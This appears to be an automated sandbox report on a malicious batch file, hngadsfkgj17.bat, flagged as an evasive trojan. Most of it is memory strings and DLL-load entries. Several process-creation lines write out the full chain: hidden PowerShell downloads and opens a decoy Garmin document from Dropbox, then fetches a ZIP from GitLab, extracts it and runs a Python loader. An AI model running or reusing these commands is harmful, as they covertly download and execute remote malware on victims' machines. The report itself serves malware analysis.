                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/v/s/playlist/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropboxstatic.com/static/
                  Source: powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                  Source: powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellofax.com/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellosign.com/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paypal.com/sdk/js
                  Source: powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.recaptcha.net/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.6:49721 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.6:49738 version: TLS 1.2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD344D652512_2_00007FFD344D6525
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD344C5EB814_2_00007FFD344C5EB8
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD344D38D516_2_00007FFD344D38D5
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD344D3D3016_2_00007FFD344D3D30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD344D53C116_2_00007FFD344D53C1
                  Source: classification engineClassification label: mal88.troj.evad.winBAT@30/16@3/2
                  Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\tmpJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5068:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_baoyfxcz.5oa.ps1Jump to behavior
                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hngadsfkgj17.bat" "
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Windows\System32\chcp.comKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hngadsfkgj17.bat" "
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\hngadsfkgj17.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\hngadsfkgj17.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\hngadsfkgj17.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\hngadsfkgj17.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\hngadsfkgj17.bat"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\hngadsfkgj17.bat"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\hngadsfkgj17.bat"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\hngadsfkgj17.bat"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
